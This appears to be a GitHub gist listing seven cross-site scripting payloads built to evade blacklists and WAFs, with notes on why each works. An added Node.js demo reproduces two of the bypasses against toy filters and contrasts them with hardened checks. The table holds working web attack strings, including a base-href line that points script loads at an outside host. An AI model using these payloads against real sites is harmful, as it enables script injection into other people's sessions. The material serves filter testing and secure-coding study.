Created September 15, 2018 21:40
Gist nani1337/fcc68e0282b8b104b5e1974a9d7ecfb3
| Payload | Notes |
|---|---|
| `java%0d%0ascript%0d%0a:alert(0)` | CRLF injection to bypass a blacklist on the literal string `javascript:`. URL parsers strip CR, LF and tab from the input before the scheme is read, so the browser ends up with `javascript:alert(0)` while a filter that searches for `javascript:` sees nothing. |
| `<svg%0donload=prompt(1)>` | In case `svg onload=` is filtered: the `%0d` is a valid separator between the tag name and the attribute, and it can confuse WAFs that expect a space there. `%0a`, `%0c` and `%09` work the same way, since the HTML tokenizer treats tab, LF, FF, CR and space as whitespace. `%00` is also commonly tried, but current browsers replace NUL with U+FFFD inside the tag name rather than treating it as a separator, so it only helps against legacy parsers. |
| `<input onfocus=alert(0) autofocus>` | If a dev has hard-coded a blacklist of tags and handlers to "protect" from XSS, `input` is sometimes forgotten. `autofocus` triggers `onfocus` without any user interaction. |
| `\"-alert(0);//` | Breaks out of a double-quoted string inside a script tag when the application escapes `"` as `\"` but leaves backslashes alone. The value lands in the page as `\\"-alert(0);//`: the injected backslash escapes the server's backslash, the quote terminates the string, `-alert(0)` runs, and `//` comments out the rest of the line. If the application escapes backslashes as well, this does not work. |
| `"onmouseenter=confirm(1)>` | Closes an attribute value and appends an event handler. The WAF blacklisted `alert(0)` and `prompt(0)` but failed to filter `confirm(1)`, as well as `onmouseenter=`. `onmouseenter` fires when the pointer enters the element, much like `onmouseover` (the only real difference is that it does not bubble), but a lot of devs do not know it exists and fail to blacklist it. |
| `<base href=//yoursite.com>` | Same as above: `base href` is usually not filtered by a WAF. It rewrites the document base URL, so any script the page loads by a relative `src` after the injected tag is fetched from your host instead; a request arriving at that host confirms the injection even when inline handlers are blocked. Scripts that appear before the injection point are unaffected. |
| `%uff1cscript%uff1ealert(1)%uff1c/script%uff1e` | From ghettobypass and used on ASP.NET endpoints: the `%uXXXX` form is decoded by ASP.NET's request parsing, and the fullwidth `＜` (U+FF1C) and `＞` (U+FF1E) are typically best-fit mapped to ASCII `<` and `>` when the value is later normalised or converted to a narrow code page, so the filter sees fullwidth characters while the page gets `<script>`. I highly recommend bookmarking his page. |
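Added example, not part of the gist: the first and fourth payloads above reproduced in Node.js against a toy blacklist and a toy quote-escaper, so the canonicalisation that defeats each filter can be observed outside a browser. The filter functions, the `hook` stand-in for `alert(0)` and the `https://example.invalid/` base origin are assumptions made for this demo, not anything the gist describes.

```javascript
// Added example (not from the gist): two of the blacklist bypasses above,
// reproduced against toy filters. Uses only Node.js built-ins (WHATWG URL,
// Function); no network, no DOM.

// --- 1. CRLF in the scheme: java%0d%0ascript%0d%0a:alert(0) ---------------

// Toy blacklist a dev might write: reject anything containing "javascript:".
function blacklistRejects(href) {
  return /javascript:/i.test(href);
}

// What the browser actually does: the WHATWG URL parser strips every ASCII
// tab, CR and LF from the input before reading the scheme, so the split
// string canonicalises to javascript:alert(0). Returns null if unparseable.
function effectiveScheme(href) {
  try {
    return new URL(href).protocol;
  } catch {
    return null;
  }
}

// Hardened check: parse first, then allow-list the scheme. Relative URLs are
// resolved against a fixed origin (assumed for the demo).
function allowlistRejects(href) {
  let scheme;
  try {
    scheme = new URL(href, 'https://example.invalid/').protocol;
  } catch {
    return true;
  }
  return !['http:', 'https:'].includes(scheme);
}

// The gist shows the payload URL-encoded; decoding it is what the server
// does before the value is reflected into the page.
const crlfPayload = decodeURIComponent('java%0d%0ascript%0d%0a:alert(0)');

// --- 2. \"-alert(0);// : escaping the quote but not the backslash -----------

// Naive escaping: only double quotes get a backslash.
function naiveEscape(s) {
  return s.replace(/"/g, '\\"');
}

// JSON.stringify escapes backslashes, quotes and control characters, which
// is what a JS string literal needs. (Embedding inside <script> additionally
// requires escaping "</" and U+2028/U+2029; out of scope here.)
function properEscape(s) {
  return JSON.stringify(s).slice(1, -1);
}

// Build the script body the server would emit with the user value inside a
// double-quoted string, then run it. `hook` stands in for alert(0) so the
// breakout is observable in Node. Returns whether hook ran and the result.
function runReflected(escapeFn, userInput) {
  let hookCalled = false;
  const hook = () => { hookCalled = true; };
  const body = 'var name = "' + escapeFn(userInput) + '"; return typeof name;';
  let result;
  try {
    result = new Function('hook', body)(hook);
  } catch (e) {
    result = 'syntax error: ' + e.message;
  }
  return { hookCalled, result, body };
}

// What the attacker sends: \"-hook();//  (hook() in place of alert(0))
const breakoutPayload = '\\"-hook();//';

console.log('blacklistRejects :', blacklistRejects(crlfPayload));
console.log('effectiveScheme  :', effectiveScheme(crlfPayload));
console.log('allowlistRejects :', allowlistRejects(crlfPayload));
console.log('naive escaping   :', runReflected(naiveEscape, breakoutPayload));
console.log('proper escaping  :', runReflected(properEscape, breakoutPayload));
```

The two halves make the same point from different angles: the blacklist and the naive escaper both inspect the raw bytes, while the browser (or the JS parser) first canonicalises them, and the bypass lives in the gap between the two views. The allow-list variant closes the gap by running the same parser the browser will, then deciding on the parsed result.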